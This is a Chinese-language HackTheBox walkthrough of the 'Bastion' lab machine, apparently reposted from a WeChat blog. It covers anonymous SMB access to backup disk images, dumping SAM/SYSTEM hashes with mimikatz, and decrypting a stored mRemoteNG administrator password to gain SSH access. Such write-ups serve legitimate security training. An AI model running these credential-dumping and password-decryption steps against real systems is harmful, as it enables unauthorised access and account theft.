渗透测试靶机练习No.113 HTB:Bastion

admin 2022年9月28日14:02:28安全文章评论15 views1552字阅读5分10秒阅读模式

渗透测试靶机练习No.113 HTB:Bastion

靶机信息

靶机地址:

 https://app.hackthebox.com/machines/Bastion

靶场: HackTheBox.com

靶机名称: Bastion

难度: 简单

提示信息:

 

目标: user.txt和root.txt

实验环境

 攻击机:Windows11 10.10.16.4
 
 靶机:10.10.10.134

信息收集

扫描端口

扫描靶机开放的服务端口

 sudo nmap -p- 10.10.10.134

渗透测试靶机练习No.113 HTB:Bastion

 nmap -sC -sV -p 22,135,139,445,5985,47001,49664-49670 10.10.10.134 -oN nmap.log

渗透测试靶机练习No.113 HTB:Bastion

渗透测试靶机练习No.113 HTB:Bastion

扫描到多个开放端口,扫描结果中发现smb可以使用guest来宾用户访问

SMB匿名访问

验证guest是否可以访问

 net use \10.10.10.134

渗透测试靶机练习No.113 HTB:Bastion

验证成功,直接访问

 \10.10.10.134


渗透测试靶机练习No.113 HTB:Bastion

发现Backups目录,继续访问

10.10.10.134BackupsWindowsImageBackupL4mpje-PCBackup 2019-02-22 124351’目录下发现两个虚拟磁盘文件

渗透测试靶机练习No.113 HTB:Bastion

直接双击打开,36M的是个引导镜像,5G的是系统镜像

渗透测试靶机练习No.113 HTB:Bastion

提取SAM和SYSTEM文件,文件位于C:windowssystem32config目录下

渗透测试靶机练习No.113 HTB:Bastion

找到文件直接拖出来,再使用mimikatz读取密码

渗透测试靶机练习No.113 HTB:Bastion

渗透测试靶机练习No.113 HTB:Bastion

双击打开后在弹出的cmd下读取密码(命令中的../是上级目录,,SAM文件我存放在Bastion目录下)

 lsadump::sam /sam:../../SAM /SYSTEM:../../SYSTEM

渗透测试靶机练习No.113 HTB:Bastion

拿到Administrator和L4mpje两个用户的密码hash,

解密Administrator密码Hash解不出来

渗透测试靶机练习No.113 HTB:Bastion

解密L4mpje密码Hash

渗透测试靶机练习No.113 HTB:Bastion

cmd5的会员才能解密,这里感谢鹏组

渗透测试靶机练习No.113 HTB:Bastion

拿到L4mpje的密码,尝试登录SSH

 ssh [email protected]

渗透测试靶机练习No.113 HTB:Bastion

登录成功,找找敏感信息

 dir
 cd desktop
 dir
 type user.txt

渗透测试靶机练习No.113 HTB:Bastion

进入L4mpje用户的桌面找到user.txt,顺利拿到flag,继续找

 powershell(切换到powershell,切不切都可以只是个人习惯)
 cd "program files (x86)"

渗透测试靶机练习No.113 HTB:Bastion

在program files (x86)目录下发现远程连接工具mRemoteNG来找找这个工具是否存在漏洞

渗透测试靶机练习No.113 HTB:Bastion

发现可以解密mRemoteNG存储密码的脚本和使用教程

 https://vk9-sec.com/exploiting-mremoteng/

切换到C:UsersL4mpjeAppDataRoamingmRemoteNG目录并查看密码存储文件

 cd C:UsersL4mpjeAppDataRoamingmRemoteNG
 ls

渗透测试靶机练习No.113 HTB:Bastion

查看confCons.xml文件内容

 type confCons.xml

渗透测试靶机练习No.113 HTB:Bastion

拿到administrator的加密后的密码,使用脚本破解

 git clone https://github.com/haseebT/mRemoteNG-Decrypt.git

渗透测试靶机练习No.113 HTB:Bastion

使用-s参数通过字符串方式解密

 py3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

渗透测试靶机练习No.113 HTB:Bastion

拿到Administrator密码,ssh登录

 ssh [email protected]

渗透测试靶机练习No.113 HTB:Bastion

登录成功,直接来找flag

 cd desktop
 type root.txt

渗透测试靶机练习No.113 HTB:Bastion

拿到root.txt,游戏结束

渗透测试靶机练习No.113 HTB:Bastion

渗透测试靶机练习No.113 HTB:Bastion

渗透测试靶机练习No.113 HTB:Bastion


原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.113 HTB:Bastion

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月28日14:02:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  渗透测试靶机练习No.113 HTB:Bastion http://cn-sec.com/archives/1321127.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: